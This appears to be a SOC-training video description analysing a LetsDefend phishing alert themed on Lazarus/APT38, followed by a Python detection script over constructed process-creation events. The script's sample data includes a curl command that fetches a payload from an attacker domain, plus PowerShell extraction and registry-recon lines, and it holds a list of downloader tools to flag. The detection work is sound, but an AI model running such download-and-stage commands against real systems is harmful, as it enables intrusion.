Lazarus APT38 Phishing Fake Crypto Job → curl Payload → PowerShell Recon | LetsDefend Alert SOC337

Published: 16 May 2026
on channel: InkSec

Day 107 of Becoming a SOC Analyst — SOC337 Lazarus Phishing Campaign Detected APT38 (True Positive)
A phishing email with subject "Invitation Coinbase Crypto Trader Hiring Assessment" was delivered to Ellen at letsdefend.io, containing a malicious link to blockchainjobhub.com — confirmed crypto phishing infrastructure. Logs confirm the user clicked the link, triggering curl.exe spawned from explorer.exe (EventID 4688) to download nvidiaupdate.zip from api.drivercams.cloud and a secondary S3 staging source, followed by PowerShell extraction and registry query reconnaissance — a textbook Lazarus APT38 initial access and staging sequence. Endpoint was contained before lateral movement.
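The sequence above (curl.exe spawned by explorer.exe, PowerShell extraction, then registry-query reconnaissance) is the kind of chain a SOC can catch in process-creation telemetry. The following is an added detection example, not code from the video or from LetsDefend: it replays constructed Windows Security 4688 records for the same three stages and flags them. Field names (EventID, Host, ParentProcessName, NewProcessName, CommandLine) assume a SIEM that normalises 4688 into those keys; the hostname, file paths and the queried registry key are constructed samples, while the domain and archive name are taken from the alert description.

```python
"""Stage detection over constructed 4688 process-creation events.

Added example for illustration; not the analyst's or the platform's code.
"""
import re
from typing import Dict, List, Optional

# Constructed 4688-style records as a SIEM might normalise them.
# Hostname, paths and the registry key are made up; the domain and
# archive name come from the alert description.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4688", "Host": "ellen-pc",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\Ellen\AppData\Local\Temp\nvidiaupdate.zip "
                    r"https://api.drivercams.cloud/nvidiaupdate.zip"},
    {"EventID": "4688", "Host": "ellen-pc",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Expand-Archive '
                    r'-Path $env:TEMP\nvidiaupdate.zip -DestinationPath $env:TEMP\nv"'},
    {"EventID": "4688", "Host": "ellen-pc",
     "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    # Benign control: a user opening Outlook from the desktop must not fire.
    {"EventID": "4688", "Host": "ellen-pc",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Command-line download utilities that rarely have a reason to be launched
# directly by the interactive shell on a user workstation.
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
INTERACTIVE_SHELLS = {"explorer.exe"}
CHAIN_STAGES = {"download", "extract", "recon"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Map one 4688 record to a chain stage, or None if it looks benign."""
    if event.get("EventID") != "4688":
        return None
    parent = basename(event.get("ParentProcessName", ""))
    child = basename(event.get("NewProcessName", ""))
    cmd = event.get("CommandLine", "")
    host = event.get("Host", "unknown")

    # Stage 1: a downloader launched straight from the user's shell with a URL.
    if parent in INTERACTIVE_SHELLS and child in DOWNLOADERS:
        match = URL_RE.search(cmd)
        if match:
            return {"stage": "download", "host": host, "detail": match.group(0)}
    # Stage 2: PowerShell unpacking an archive (cmdlet or .NET ZipFile API).
    if child == "powershell.exe" and re.search(
            r"expand-archive|io\.compression\.zipfile", cmd, re.IGNORECASE):
        return {"stage": "extract", "host": host, "detail": cmd}
    # Stage 3: registry enumeration via reg.exe query.
    if child == "reg.exe" and re.search(r"\bquery\b", cmd, re.IGNORECASE):
        return {"stage": "recon", "host": host, "detail": cmd}
    return None


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return every event that matches a chain stage, in input order."""
    return [f for f in map(classify, events) if f is not None]


def hosts_with_full_chain(findings: List[Dict[str, str]]) -> List[str]:
    """Hosts on which all three stages were observed (escalation candidates)."""
    stages_by_host: Dict[str, set] = {}
    for f in findings:
        stages_by_host.setdefault(f["host"], set()).add(f["stage"])
    return sorted(h for h, s in stages_by_host.items() if CHAIN_STAGES <= s)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for hit in hits:
        print(f"[{hit['stage']:8}] {hit['host']}: {hit['detail']}")
    print("full chain on:", hosts_with_full_chain(hits))
```

Each stage on its own is low-fidelity (an administrator may legitimately run `reg query`), which is why the per-host correlation in `hosts_with_full_chain` is what should drive escalation; a single `download` hit from explorer.exe is still worth a look because it points at the clicked link and the staging URL to block.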
🔬 Analysis Reports
🧪 Hybrid Analysis → https://hybrid-analysis.com/sample/f5...
🦠 VirusTotal (blockchainjobhub.com) → https://www.virustotal.com/gui/url/1d...
🦠 VirusTotal (drivercams.cloud) → https://www.virustotal.com/gui/url/4d...
🦠 VirusTotal (S3 source) → https://www.virustotal.com/gui/url/97...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.

00:00 Day 107 intro
01:00 Alert Details
01:30 Investigation
16:38 Playbook Answers
23:45 5w Log
27:00 Result
27:20 summary and thoughts

🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #LazarusGroup #APT38 #Phishing #CryptoScam #PowerShell #IncidentResponse #SIEM #Day107 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity